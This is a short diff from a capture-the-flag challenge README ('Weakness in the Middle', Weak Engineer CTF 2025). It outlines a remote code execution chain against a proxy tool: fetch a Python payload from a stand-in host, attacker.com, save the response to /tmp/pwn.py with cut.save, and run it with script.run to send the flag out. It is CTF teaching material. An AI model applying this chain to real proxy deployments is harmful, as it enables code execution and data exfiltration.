tepel-chen/My-CTF-Challs/Full Weak Engineer CTF 2025/Weakness in the Middle/README.md

 Using this, we can achieve RCE in the following steps:

 1. Send a request through the proxy to `http://attacker.com/pwn.py`.
 The response contains Python code that sends the flag to the attacker’s server.
-2. Run the cut.save command with flows=`~d attacker.com`, cut=r`esponse.txt`, and path=`/tmp/pwn.py`.
+2. Run the cut.save command with flows=`~d attacker.com`, cut=`response.txt`, and path=`/tmp/pwn.py`.
 If the flow result is a single item, the response body from step 1 is written directly to `/tmp/pwn.py`.
 3. Run `script.run` with `/tmp/pwn.py` to execute the Python code, which exfiltrates the flag to the attacker’s server.

 ### Unintended solution